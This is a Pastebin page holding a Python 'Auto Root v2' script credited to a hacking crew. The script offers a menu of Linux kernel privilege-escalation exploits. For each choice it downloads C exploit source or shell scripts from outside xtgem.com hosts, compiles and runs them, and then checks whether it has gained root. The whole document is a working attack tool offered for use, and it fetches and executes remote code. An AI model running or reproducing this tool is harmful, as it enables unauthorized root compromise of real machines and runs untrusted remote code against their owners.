Advertisement
1337_Brain

Auto Root v2

Jun 25th, 2014
642
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.10 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Changing The Description of a tool Won't Make You a Programmer!
  3. # jutthaxor@gmail.com
  4.  
  5.  
  6. import os,urllib,sys
  7.  
  8. print '''
  9. ____  ____   __   _  _    _  _  ____  __     __  __  ____  ____  ____  ____     __   _  _  ____  __     ____   __    __  ____
  10. (_  _)(  __) / _\ ( \/ )  ( \/ )(  _ \(  )   /  \(  )(_  _)(  __)(  _ \/ ___)   / _\ / )( \(_  _)/  \ (  _ \ /  \ /  \(_  _)
  11. )(   ) _) /    \/ \/ \ )  (  ) __// (_/\(  O ))(   )(   ) _)  )   /\___ \ /    \) \/ (  )( (  O )   )   /(  O )(  O ) )(  
  12. (__) (____)\_/\_/\_)(_/  (_/\_)(__)  \____/ \__/(__) (__) (____)(__\_)(____/  \_/\_/\____/ (__) \__/   (__\_) \__/  \__/ (__)
  13.  
  14.  
  15.  
  16.     # Python Autoroot script
  17.     # Author: Muhammad Adeel aka Innoxent Stoker
  18.     # FB: facebook.com/xtoker
  19.     # Mail: Jutthaxor@gmail.com
  20.     # Greetz: *******************************************************************************
  21.               *******************************************************************************  
  22.               **   Xploiters | Pakistan Haxors Crew  |Hax Arena | Cba Team | Penta Sec     **
  23.               **                                                                           **
  24.               **                                                                           **
  25.               **      AnonGhost | MLA | And All Pakistani & Muslim HaxOrs                  **
  26.               *******************************************************************************
  27.               *******************************************************************************
  28.    
  29.     # We'll Keep Updating Script Aswell as we got Any Other Exploit.....
  30.    
  31.     # 1 - Linux Kernel 2.6.37-3-2013
  32.     # 2 - Multi - 2005-13
  33.     # 3 - Linux Kernel , 3.63.8.9-2013
  34.     # 4 - AutoRoot,  Multi 2003-2010
  35.     # 5 - 3.4-2014 Exploit
  36.     # 6 - Close
  37. '''
  38.  
  39. # Welcome to the Original Game :D .....
  40.  
  41. select = raw_input('Choose an Exploit: ')
  42.  
  43. # First Try....
  44.  
  45. if select == '1':
  46.   link = 'http://expliters.xtgem.com/2.6.37-3-2013.c'
  47.   try:
  48.     stoker = urllib.urlopen(link)
  49.     pakistani = open(link.split('/')[-1], 'w')
  50.     pakistani.write(stoker.read())
  51.     pakistani.close()
  52.     stoker.close()
  53.   except:
  54.     print("\tExploit Downloading Failed.\n")
  55.   try:
  56.     os.system("gcc -o 2.6.37-3-2013 2.6.37-3-2013.c")
  57.     os.system("./2.6.37-3-2013")
  58.     uid = os.getuid()
  59.     if uid == 0:
  60.       print("\t[*] Rooted SuccesFully.")
  61.     else:
  62.       print("[*] Exploit Fail.")
  63.   except:
  64.     print("\nExploit Execution Error Occured. Try Another one!")
  65.  
  66. # Second Try....
  67.  
  68. elif select == '2':
  69.   link = 'http://expliters.xtgem.com/exploit.c'
  70.   try:
  71.     stoker = urllib.urlopen(link)
  72.     pakistani = open(link.split('/')[-1], 'w')
  73.     pakistani.write(stoker.read())
  74.     pakistani.close()
  75.     stoker.close()
  76.   except:
  77.     print("\tExploit Downloading Failed.\n")
  78.   try:
  79.     os.system("gcc -o exploit exploit.c")
  80.     os.system("./exploit")
  81.     uid = os.getuid()
  82.     if uid == 0:
  83.       print("\t[*] Rooted SuccesFully.")
  84.     else:
  85.       print("[*] Exploit Fail.")
  86.   except:
  87.     print("\nExploit Execution Error Occured. Try Another one!")
  88.  
  89. # Third Try....
  90.  
  91. elif select == '3':
  92.   link = 'http://expliters.xtgem.com/3.63.8.9-2013.c'
  93.   try:
  94.     stoker = urllib.urlopen(link)
  95.     pakistani = open(link.split('/')[-1], 'w')
  96.     pakistani.write(stoker.read())
  97.     pakistani.close()
  98.     stoker.close()
  99.   except:
  100.     print("\tExploit Downloading Failed.\n")
  101.   try:
  102.     os.system("gcc -o 3.63.8.9-2013 3.63.8.9-2013.c")
  103.     os.system("./3.63.8.9-2013")
  104.     uid = os.getuid()
  105.     if uid == 0:
  106.       print("\n[*] Rooted SuccesFully.")
  107.     else:
  108.       print("[*] Exploit Fail.")
  109.   except:
  110.     print("\nExploit Execution Error Occured. Try Another one!")
  111.  
  112. # Forth Try....
  113.  
  114. elif select == '4':
  115.   link = 'http://expliters.xtgem.com/autoroot.sh'
  116.   try:
  117.     stoker = urllib.urlopen(link)
  118.     pakistani = open(link.split('/')[-1], 'w')
  119.     pakistani.write(stoker.read())
  120.     pakistani.close()
  121.     stoker.close()
  122.   except:
  123.     print("\tExploit Downloading Failed.\n")
  124.   try:
  125.     os.system("sh autoroot.sh")
  126.     uid = os.getuid()
  127.     if uid == 0:
  128.       print("\n[*] Rooted SuccesFully.")
  129.     else:
  130.       print("[*] Exploit Fail.")
  131.   except:
  132.     print("\nExploit Execution Error Occured. Try Another one!")
  133.  
  134. elif select == '5':
  135.   link = 'http://expliters.xtgem.com/autoroot.sh'
  136.   try:
  137.     stoker = urllib.urlopen(link)
  138.     pakistani = open(link.split('/')[-1], 'w')
  139.     pakistani.write(stoker.read())
  140.     pakistani.close()
  141.     stoker.close()
  142.   except:
  143.     print("\tExploit Downloading Failed.\n")
  144.   try:
  145.     os.system("sh autoroot.sh")
  146.     uid = os.getuid()
  147.     if uid == 0:
  148.       print("\n[*] Rooted SuccesFully.")
  149.     else:
  150.       print("[*] Exploit Fail.")
  151.   except:
  152.     print("\nExploit Execution Error Occured. Try Another one!")
  153.  
  154. if select == '5':
  155.   link = 'http://toolsroom.xtgem.com/scanner/pwn.c'
  156.   try:
  157.     stoker = urllib.urlopen(link)
  158.     pakistani = open(link.split('/')[-1], 'w')
  159.     pakistani.write(stoker.read())
  160.     pakistani.close()
  161.     stoker.close()
  162.   except:
  163.     print("\tExploit Downloading Failed.\n")
  164.   try:
  165.     os.system("gcc -o pwn pwn.c")
  166.     os.system("./pwn")
  167.     uid = os.getuid()
  168.     if uid == 0:
  169.       print("\t[*] Rooted SuccesFully.")
  170.     else:
  171.       print("[*] Exploit Fail.")
  172.   except:
  173.     print("\nExploit Execution Error Occured. Try Another one!")
  174.  
  175. # The End....
  176.  
  177. else:
  178.   print '''
  179. _____           _          _  ______         _____ _        _            
  180. /  __ \       | |        | | | ___ \     /  ___| |      | |            
  181. | /  \/ ___   __| | ___  __| | | |_/ /_   _  \ `--.| |_ ___ | | _____ _ __
  182. | |    / _ \ / _` |/ _ \/ _` | | ___ \ | | |  `--. \ __/ _ \| |/ / _ \ '__|
  183. | \__/\ (_) | (_| |  __/ (_| | | |_/ / |_| | /\__/ / || (_) |   <  __/ |  
  184. \____/\___/ \__,_|\___|\__,_| \____/ \__, | \____/ \__\___/|_|\_\___|_|  
  185.                                      __/ |                              
  186.                                     |___/                                                            
  187. '''
  188.   ex = raw_input("Hit 'ENTER' to Exit.")
  189.   sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement